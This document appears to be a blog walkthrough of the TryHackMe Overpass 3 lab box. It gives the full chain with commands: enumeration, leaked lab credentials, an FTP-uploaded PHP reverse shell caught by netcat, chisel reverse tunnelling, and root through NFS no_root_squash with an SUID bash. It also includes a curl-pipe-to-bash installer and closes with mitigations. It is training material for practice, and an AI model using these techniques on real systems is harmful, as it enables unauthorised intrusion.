How I Hacked Into a Hosting Company and Exposed a Vulnerability (THM Overpass 3)

5/5 - (2 votes)
How I Hacked Into a Hosting Company and Exposed a Vulnerability (THM Overpass 3)

BOX OVERVIEW

PREMISE

This is the third and final installment of the Overpass challenges on TryHackMe. Here are the other two overpass walkthroughs, just in case you missed them:

In today’s challenge, the team of comp-sci students is at it again with a new website hosting company. However, they haven’t learned much yet about security.

We’ll hack into their new site and escalate our privileges to the root user, and show them that they need to make some security upgrades.

ENUMERATION

First, we’ll note down our IPs in export format to use as bash variables.

export targetIP=10.10.232.238
export myIP=10.6.2.23

Let’s also start a regular nmap scan of all ports, and a dirb scan to sniff out web app directories.

The dirb scan found a /backups directory that reveals a backups.zip file.

/backups  (backups.zip)
─[kalisurfer@parrot]─[~]
└──╼ $dirb http://10.10.232.238

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Jan  5 11:16:14 2023
URL_BASE: http://10.10.232.238/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

                                          	GENERATED WORDS: 4612       	 

---- Scanning URL: http://10.10.232.238/ ----
                                                                                        	==> DIRECTORY: http://10.10.232.238/backups/
+ http://10.10.232.238/cgi-bin/ (CODE:403|SIZE:217)
+ http://10.10.232.238/index.html (CODE:200|SIZE:1770)
                                        	 
---- Entering directory: http://10.10.232.238/backups/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                   	 
	(Use mode '-w' if you want to scan it anyway)
                                                                          	 
-----------------
END_TIME: Thu Jan  5 11:23:15 2023
DOWNLOADED: 4612 - FOUND: 2

After unzipping the backups.zip file, we have two files: 

priv.key 
CustomerDetails.xlsx.pgp

Let’s move ahead and import the priv.key file using pgp.

pgp –import priv.key
pgp –decrypt-file CustomerDetails.xlsx.pgp

And now there is a third file: CustomerDetails.xlsx

This file is a spreadsheet with customer data including username/passwords and credit card numbers! Let’s record the passwords in our notes.txt file for later reference.

username:password
paradox    ShibesAreGreat123
0day    OllieIsTheBestDog
muirlandoracle    A11D0gsAreAw3s0me

The nmap scan shows a few ports open: An FTP service running on port 21, SSH on 22, HTTP on 80.

The FTP server may allow anonymous login. We’ll test that out soon. First, we’ll drill in a bit more on the open ports with a second nmap scan:

WALKING THE WEBSITE

There’s not much of use on the website running on port 80. Nothing stands out in the text on the site except the potential usernames and hobbies:

Paradox - Our lead web designer, Paradox can help you create your dream website from the ground up
Elf - Overpass' newest intern, Elf. Elf helps maintain the webservers day to day to keep your site running smoothly and quickly.
MuirlandOracle - HTTPS and networking specialist. Muir's many years of experience and enthusiasm for networking keeps Overpass running, and your sites, online all of the time.
NinjaJc01 - James started Overpass, and keeps the business side running. If you have pricing questions or want to discuss how Overpass can help your business, reach out to him!

A quick look through the source code and the developer mode doesn’t reveal anything more here. 

CONNECTING WITH FTP

We test out connecting to the FTP service as user paradox with the command:

lftp -u paradox $targetIP
password=ShibesAreGreat123 (from the xlsx spreadsheet)

We are connected and can see a bunch of files and a directory for backups.

Now that we are connected to the web hosting service, we can upload a payload to spawn a reverse shell to give us an initial foothold into the box. 

CRAFTING A REVERSE SHELL PAYLOAD

We’ll use the pentest monkey php reverse shell from revshells.com. This is a good choice because PHP files autorun on websites when the page is loaded. I’ve also used this payload successfully before on another box.

Let’s go ahead and copy the PHP reverse shell, add our lhost and lport to the file, and save the revshell as rev.php. I’ll use port 8888.

UPLOADING THE PAYLOAD WITH FTP

Let’s use the terminal window still connected to the FTP service to upload the rev.php file with the command:

put rev.php

And now, the file is in position and ready to use.

SPINNING UP A NETCAT LISTENER TO CATCH A REVSHELL

nc -lvnp 8888

Next we’ll navigate in our browser to $targetIP/revshell.php

At this point, our netcat listener catches the revshell and we now have an initial foothold as user apache!!

Let’s search for the web.flag file with the following command:

find / -type f -name web.flag 2>/dev/null

The last part of this command (2>/dev/null) sends the error messages to a null byte, hiding all of the errors.

And we’ve found it!

/usr/share/httpd/web.flag

STABILIZE A REVSHELL

We can use a Python one-liner to stabilize the shell enough to be able to switch users.

python3 -c 'import pty;pty.spawn("/bin/bash")'

Now we can do a lateral move over to paradox’s account with the password from the spreadsheet.

su paradox

RUNNING LINPEAS ON THE TARGET MACHINE

The most interesting finding of linpeas is:

╔══════════╣ Analyzing NFS Exports Files (limit 70)
-rw-r--r--. 1 root root 54 Nov 18  2020 /etc/exports
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)

The no_root_squash is a misconfiguration that allows unprivileged users to gain root access to the machine.

👉 Recommended: No Root Squash

We can see that it is set in user James’ home folder. So now our attack vector is becoming clearer. We will look for ways to privilege escalate over the James’ account.

BECOMING PARADOX

After stabilizing the revshell we can try a lateral move and switch users to paradox:

su paradox
Password(ShibesAreGreat123)

EXPLOITING NFS WITH NO_ROOT_SQUASH

Following up now on the linpeas results, let’s investigate this NFS service a bit more. Nothing showed up in the nmap scan, but it did in the linpeas results so my hunch is that the service is firewalled from the outside.

This isn’t a problem to work around, but we need to determine the port that the service is operating on. With the following command on the target machine we can find the port:

rpcinfo -p | grep nfs

We can see in the output that NFS is running on port is 2049. We’ll use a specialized secure ssh port forwarding tool, chisel to help us reroute the blocked port to our attack machine.

USING CHISEL TO PORT FORWARD

We’ll need to grab chisel from the GitHub page. There are a few ways to install it from the repo. I chose to use the one-liner:

curl https://i.jpillora.com/chisel! | bash

Once installed, I copied the chisel bin file over to the target machine. To get this done, we’ll spin up a simple HTTP server using Python, and then curl the file from the target machine.

Now that chisel is on both machines, let’s create the secure SSH tunnel with the following commands to set up port forwarding on the NFS service running on port 2049, but firewalled to the public.

From the attack box:

chisel server -p 7777 --reverse -v

From victim box:

./chisel client 10.6.2.23:7777 R:2049:127.0.0.1:2049 &

The & at the end of the command instructs bash to run the command in the background in a subshell.

BECOMING JAMES

Now let’s check to see if the NFS has any mountable directories available:

showmount -e $targetIP:2049

Another way to check is to run:

cat /etc/exports

Now let’s go ahead and mount to the folder /mount (which already exists on my machine):

sudo mount -t nfs $targetIP:/ /mount

The user.flag is right there in the /home/james directory! Checking for hidden files and directories with “ls -la” reveals a hidden directory (.ssh). Inside this directory we’ve found an ssh key.

Let’s copy this over to our machine so that we can ssh directly into James’ directory without needing their password.

GAINING ROOT PRIVILEGES WITH PERSISTENCE

From James’ account, we should be able to both set and run files with suid bits to spawn bash as root in persistence mode. Let’s first copy /bin/bash to our current file:

On target box:

cp /bin/bash .

And then add execute and add the SUID bit from our mounted NFS folder on the attack box:

chmod +xs bash

Last, but not least, let’s run it with persistence from the target box:

./bash -p

And we are now root! Let’s grab the root.txt in /root/root.txt.

RECOMMENDED MITIGATION STEPS

  1. Disable no_root_squash on NFS
  2. Change permissions on all parts of the website that are not intended to be seen by the public. This includes the /backups folder

👉 Recommended Tutorial: TryHackMe Challenge – Wonderland